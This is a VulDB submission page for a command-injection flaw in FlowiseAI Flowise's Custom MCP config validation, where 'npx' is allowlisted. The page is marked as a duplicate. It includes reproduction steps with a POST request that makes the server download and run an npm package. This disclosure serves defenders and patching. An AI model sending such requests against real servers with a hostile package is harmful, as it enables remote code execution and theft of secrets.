Enviar #777660: FlowiseAI Flowise <= 3.0.12 OS Command Injection (CWE-78)información

Título	FlowiseAI Flowise <= 3.0.12 OS Command Injection (CWE-78)
Descripción	# Technical Details A Remote Code Execution vulnerability exists in the Custom MCP (Model Context Protocol) component's `validateMCPServerConfig()` in `packages/components/nodes/tools/MCP/core.ts` of FlowiseAI Flowise. The command allowlist includes 'npx' which is an arbitrary code execution tool. When a user configures {"command":"npx","args":["-y","attacker-malicious-package"]}, the validation passes because npx is in the allowedCommands list and the args contain no dangerous patterns. This triggers child_process.spawn('npx', ['-y', 'attacker-malicious-package']) which downloads and executes arbitrary npm packages from the public registry with full server process privileges. # Vulnerable Code File: packages/components/nodes/tools/MCP/core.ts (line 269) Method: validateMCPServerConfig() Why: The allowedCommands list ['node', 'npx', 'python', 'python3', 'docker'] includes 'npx' which can download and execute arbitrary code. The argument validation (validateArgsForLocalFileAccess and validateCommandInjection) cannot detect this because package names are plain strings. # Reproduction 1. Deploy Flowise: docker run -d --name flowise-test -p 3001:3000 flowiseai/flowise:latest 2. Authenticate and get JWT cookie. 3. Send malicious MCP config: POST /api/v1/node-load-method/customMCP with {"loadMethod":"listActions","inputs":{"mcpServerConfig":"{\"command\":\"npx\",\"args\":[\"-y\",\"cowsay\"]}"}} 4. Verify execution: docker exec flowise-test ls -la /root/.npm/_npx/ shows npx cache directory created. # Impact - Full Remote Code Execution on the Flowise server. - Exfiltrate secrets (.env file, database credentials, LLM API keys). - Install persistence (cron jobs, SSH keys, backdoors). - Lateral movement via leaked credentials.
Fuente	⚠️ https://gist.github.com/YLChen-007/4442c386739b2087db1473be703b4ccd
Usuario	Eric-a (UID 96353)
Sumisión	2026-03-11 15:04 (hace 3 meses)
Moderación	2026-05-06 09:40 (2 months later)
Estado	Duplicado
Entrada de VulDB	358753 [FlowiseAI Flowise hasta 3.0.x /tmp/pwn escalada de privilegios]
Puntos	0

◂ Anterior Visión De Conjunto Próximo ▸

Want to know what is going to be exploited?

We predict KEV entries!